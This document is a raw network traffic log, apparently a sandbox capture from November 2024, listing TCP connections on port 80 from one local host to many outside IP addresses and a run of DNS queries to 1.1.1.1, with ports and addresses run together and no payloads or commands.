                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645759106 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645843029 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645968914 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.650819063 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.744774103 CET8062610208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.745031118 CET6261080192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.991812944 CET8062609154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.992306948 CET6260980192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100305080 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100322962 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100389004 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100425959 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:32.161417007 CET8062592199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:32.161472082 CET6259280192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.164213896 CET8062367188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.164328098 CET6236780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.551537037 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.556792021 CET806263744.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.556890011 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.557862997 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.562865973 CET806263875.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.562957048 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.593327999 CET8062371188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.593384027 CET6237180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632031918 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632278919 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632932901 CET6263980192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.633280993 CET6264080192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.633970022 CET6264180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.636917114 CET806263875.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.637284040 CET806263744.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638114929 CET806263923.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638190985 CET6263980192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638355970 CET806264018.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638407946 CET6264080192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638761044 CET806264144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638811111 CET6264180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.742208004 CET8062612178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.742281914 CET6261280192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.874906063 CET6264380192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.874990940 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.879873991 CET8062643208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.879905939 CET806264444.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.880003929 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.880029917 CET6264380192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:57.488435030 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:57.488490105 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:09:01.073826075 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:01.075037956 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:09:03.366832972 CET805696076.223.67.189192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:03.366956949 CET5696080192.168.2.976.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:09:10.167681932 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:10.167742014 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:09:10.935748100 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:10.935878992 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:09:11.234239101 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:11.234325886 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.416124105 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.421250105 CET804926964.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.446312904 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.446414948 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.475048065 CET5696080192.168.2.976.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.480012894 CET805696076.223.67.189192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.481975079 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.488845110 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.500861883 CET5696180192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.500941038 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.505935907 CET805696164.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.505999088 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.523370981 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.529464006 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.529512882 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.537091970 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.542152882 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.544198036 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.544245958 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.549235106 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.549936056 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.549985886 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.564763069 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.570178032 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.570254087 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.579363108 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.584455967 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.594831944 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.594922066 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.601506948 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.601578951 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.748615026 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.748677015 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:27.895540953 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:28.348663092 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:09:28.348689079 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:28.504925966 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:29.551800966 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:09:29.551989079 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:29.708025932 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:31.989299059 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:09:31.989320993 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:32.192430973 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:36.895560026 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:36.895593882 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:09:37.084964991 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:46.504937887 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:09:46.505027056 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:09:46.692383051 CET5495580192.168.2.9199.59.243.227
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.184300900 CET53643851.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.184617043 CET4948953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.184793949 CET6477653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.184969902 CET5626553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.185086012 CET5733053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.185431004 CET53515201.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.185733080 CET5712553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.185916901 CET5242453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.186033010 CET6330053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.186233044 CET5100453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.186655998 CET5514453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.186803102 CET5493153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.187161922 CET6349253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.187441111 CET5594353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.187625885 CET5076053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.187792063 CET5027653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.187978029 CET5583953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.188162088 CET5045053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.188884974 CET5569153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.191701889 CET53587221.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.191850901 CET5019053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.192028999 CET5785653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.192138910 CET5469253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.192584038 CET53561201.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.193181992 CET53621971.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.194591045 CET5815053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.195535898 CET53573301.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.195763111 CET53633001.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.195784092 CET5321853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.196017981 CET5518953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.197088957 CET53549311.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.197242975 CET53559431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.197758913 CET53562651.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.198183060 CET5235753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.198436022 CET5267153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.198632956 CET53504501.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.198961973 CET5758453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.200692892 CET6133453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.202862024 CET53544431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.204755068 CET53581501.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.206022978 CET5306653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.206023932 CET53551891.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.206855059 CET53532181.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.208457947 CET5189153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.210419893 CET53613341.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.212877989 CET53557061.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.214411020 CET53636171.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.215291023 CET6139353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216473103 CET53494891.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216629028 CET53530661.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216886044 CET53647761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.216995001 CET53571251.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.217721939 CET53526711.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.217736006 CET53510041.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.218518972 CET53518911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.218794107 CET53634921.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.222842932 CET53578561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.223121881 CET53546921.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.224760056 CET53613931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.229293108 CET53523571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.229310036 CET53575841.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.321594000 CET53512561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.384259939 CET53551441.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.386358023 CET53573791.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.426152945 CET53558391.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.435403109 CET53507601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.453023911 CET53501901.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.479360104 CET53502761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.100346088 CET53556911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.114747047 CET53524241.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.982004881 CET5951653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.982585907 CET5760553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.983777046 CET6381153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.984375954 CET5981653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.989244938 CET6057153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.992427111 CET53576051.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.996062994 CET53598161.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.996177912 CET53638111.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.000608921 CET53605711.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.024355888 CET53595161.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.041429043 CET5601553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.056638956 CET5017653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.057015896 CET5310353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.058934927 CET5515353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.065152884 CET5978153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.065434933 CET53531031.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.068213940 CET53501761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.069690943 CET53551531.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.071651936 CET53560151.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.075040102 CET53597811.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.127448082 CET6512353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.127829075 CET5311553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.138256073 CET53531151.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.144922018 CET5294553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.156750917 CET5374953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.158482075 CET5546053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.166023970 CET53537491.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.176512957 CET53529451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.189127922 CET53554601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.231679916 CET5353953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.241358995 CET5617653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.266320944 CET4942553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.270433903 CET5606053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.274446964 CET5000053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.277981043 CET5669453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.786787987 CET53501001.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.787626982 CET53562581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.791198015 CET53542761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.793798923 CET5299253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.795231104 CET53508701.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.798697948 CET5232353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.798989058 CET53619531.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.800889969 CET5178253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.805293083 CET5664653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.806755066 CET5941253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.808929920 CET53523231.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.811471939 CET53517821.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.813694954 CET5307153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814013958 CET6066353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814358950 CET5444253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814594984 CET6185853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814817905 CET5925453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.819309950 CET5372753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.819498062 CET6052153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.819928885 CET5747753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.820631981 CET5035453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.821968079 CET5576453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.822465897 CET5083753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.822798967 CET5911253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.824351072 CET53618581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.825009108 CET53544421.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.825763941 CET53592541.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.826710939 CET53529921.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.829946041 CET53574771.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.830632925 CET53537271.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.832420111 CET53591121.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.835787058 CET53566461.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.837743044 CET53594121.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.838185072 CET5610253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.838337898 CET5167553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.838566065 CET5820753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.840373993 CET53605211.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.842166901 CET6078253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.843343973 CET6097653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.843611002 CET6230453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.843849897 CET5366753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.844157934 CET6455753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.844299078 CET6547653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.844316959 CET53530711.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.845124006 CET53606631.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.845380068 CET5534353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.848262072 CET53561021.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.848705053 CET53582071.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.852308989 CET53503541.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.853200912 CET53623041.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.853343010 CET53508371.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.853421926 CET53557641.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.853432894 CET53536671.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.854100943 CET53654761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.854110956 CET53645571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.854145050 CET53609761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.856334925 CET53553431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.856781960 CET53516751.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.874792099 CET53607821.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.881503105 CET6037253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.896825075 CET53603721.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.899296045 CET5127853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.899657965 CET5321653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.900702000 CET6295753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.900995016 CET5859053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.901168108 CET6386653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.901325941 CET5182253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.909743071 CET5435553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.909800053 CET6215553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.909985065 CET6369953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.910260916 CET53532161.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.910278082 CET53512781.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.910761118 CET53629571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.911767006 CET53518221.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.912951946 CET53585901.1.1.1192.168.2.9
